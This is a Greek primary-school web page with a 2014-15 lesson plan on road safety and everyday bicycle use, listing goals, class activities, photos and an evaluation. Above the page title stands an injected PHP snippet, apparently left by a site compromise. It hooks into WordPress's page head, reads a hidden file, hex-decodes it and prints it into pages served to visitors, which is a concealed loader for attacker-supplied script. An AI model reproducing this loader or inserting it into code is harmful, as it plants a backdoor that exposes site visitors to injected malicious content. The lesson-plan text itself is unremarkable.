if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Κυκλοφοριακή αγωγή |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Κυκλοφοριακή αγωγή

ΠΗΛΙΟΥΡΑ ΒΑΣΙΛΙΚΗ ΠΕ70

ΑΥΓΕΡΗΣ ΒΑΣΙΛΗΣ ΠΕ70

ΒΑΒΙΤΣΑ ΠΑΤΡΟΥΛΑ ΠΕ20

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

ΚΥΚΛΟΦΟΡΙΑΚΗ ΑΓΩΓΗ

Τίτλος: Το ποδήλατο στην καθημερινή μας ζωή.

Τάξη: Γ     Σχ. Έτος 2014-15

Οι μαθητές σκεφτόμενους τρόπους με τους οποίους μπορεί να περιοριστεί η κατανάλωση καυσίμων, κατέληξαν στο συμπέρασμα: χρησιμοποιούμε, όποτε είναι δυνατό το ποδήλατο για τις μετακινήσεις μας αντί για το αυτοκίνητο.

*  Γνωστικοί

-Να γνωρίζουν οι μαθητές τι σημαίνει << Κυκλοφοριακή Αγωγή >>

-Να αντιληφθούν με σαφήνεια πως λειτουργούν τα σήματα και τι

σημαίνει το καθένα.

-Να μάθουν πως πρέπει να διασχίζουν το δρόμο και πως να

περπατούν στο πεζοδρόμιο.

-Να αναφέρουν πως να οδηγούν το ποδήλατό τους, για τη χρήση του

κράνους, τις επιγονατίδες και τις επιαγκωνίδες.

-Να γνωρίζουν τι χρειάζεται να ελέγξουν πριν οδηγήσουν το

ποδήλατο  και ο τρόπος συντήρησής του.

 * Ψυχοκινητικοί

Ενεργοποίηση όλων των αισθήσεων των μαθητών με δημιουργικές

εργασίες ?θεατρικό παιχνίδι

  *Συναισθηματικοί

-Να ευαισθητοποιηθούν τα παιδιά σε διάφορα θέματα Κυκλοφοριακής Αγωγής.

-Να αποκτήσουν κυκλοφοριακή συνείδηση από τη μεριά του πεζού και του ποδηλάτη.

 *Κοινωνικοί

Εργασίες σε ομάδες.

Ανάπτυξη πρωτοβουλιών και ελεύθερης έκφρασης ιδεών από τους μαθητές.

 *Προβληματισμός

Οι μαθητές διαβάζουν στην τάξη και ακούν σε CD το εκπαιδευτικό παραμύθι για την ασφάλεια << Ο φίλος μου ο Ποδηλατάκιας >>που έχει κυκλοφορήσει το Υπουργείο Μεταφορών και Δικτύων.

 *Δραστηριότητες

-Οι μαθητές συγκεντρώνουν είτε από φυλλάδια είτε από το διαδίκτυο είτε από προσωπικές εμπειρίες τους κανόνες για τη σωστή οδική συμπεριφορά.

-Γνωρίζουν, ζωγραφίζουν και κατασκευάζουν τα σήματα του Κ.Ο.Κ.


foto2.jpgfoto1.jpg

-Παρατηρούν τις πινακίδες του Κώδικα Οδικής Κυκλοφορίας στους γύρω δρόμους του σχολείου.

-Δημιουργούν αυτοσχέδιο πάρκο κυκλοφοριακής αγωγής στον κήπο του σχολείου.

100_1901 (Copy).JPG 100_1905 (Copy).JPG

-Οι μαθητές περιγράφουν και σχεδιάζουν το δικό τους ποδήλατο.

100_1835 (Copy).JPG
podilato_2 001 (Copy).jpg
podilato1 (Copy).jpg

-Δημιουργούν τη δική τους ακροστιχίδα με τη λέξη ποδήλατο και βρίσκουν λέξεις που να ανήκουν στην ίδια οικογένεια.

akrostixida5 001 (Copy).jpg akrostixida7 001 (Copy).jpg akrostixida6 001 (Copy).jpg akrostixa4 001 (Copy).jpg akrostixida3 001 (Copy).jpg akrostixa2 001 (Copy).jpg akrostixida1 001 (Copy).jpg

-Επισκέπτονται το κατάστημα πώλησης ποδηλάτων και διατυπώνουν ερωτήσεις για τα είδη αλλά και το κόστος των ποδηλάτων .Επίσης γνωρίζουν βασικά εξαρτήματα για τη ασφαλή οδήγηση πριν ανέβουν στο ποδήλατό τους και τρόπους για τη συντήρησή του.

100_1889 (Copy).JPG
foto33.jpg
antiposi1 001 (Copy).jpg
entyposi2 001 (Copy).jpg
entiposi3 001 (Copy).jpg
entiposi4 001 (Copy).jpg
entiposi5 001 (Copy).jpg
entiposi6 001 (Copy).jpg

-Περιγράφουν και ζωγραφίζουν ένα χάρτη που να εξηγούν τη ασφαλέστερη διαδρομή με το ποδήλατό τους από το σπίτι στο σχολείο.

diadromi1 001 (Copy).jpg
diadromi2 001 (Copy).jpg
diadromi3 001 (Copy).jpg

-Δραματοποιούν σε θεατρικό παιχνίδι: <<Το ποδήλατο >> του Βαγγέλη Ηλιόπουλου.

-Ακούν και τραγουδούν το τραγούδι << Η ποδηλάτισσα >>

ΑΞΙΟΛΟΓΗΣΗ

 Διαπιστώθηκε ότι όλοι οι μαθητές έχουν το δικό τους ποδήλατο και ορισμένοι  το χρησιμοποιούν, όταν οι καιρικές συνθήκες το επιτρέπουν για να έρθουν στο σχολείο. Μέσα από τις δραστηριότητες συνειδητοποίησαν πως η τήρηση των κανόνων του Κώδικα Οδικής Κυκλοφορίας βοηθά στην αποφυγή ατυχημάτων.

Επίσης αποτελεί κοινή διαπίστωση ότι το ποδήλατο χρειάζεται να ενταχθεί στις δραστηριότητες της καθημερινής μας ζωής ,γιατί ο ποδηλάτης συνήθως είναι σε πολύ καλή φυσική κατάσταση και ένα ποδήλατο δεν είναι τόσο ακριβό και το κόστος συντήρησής του είναι ελάχιστο.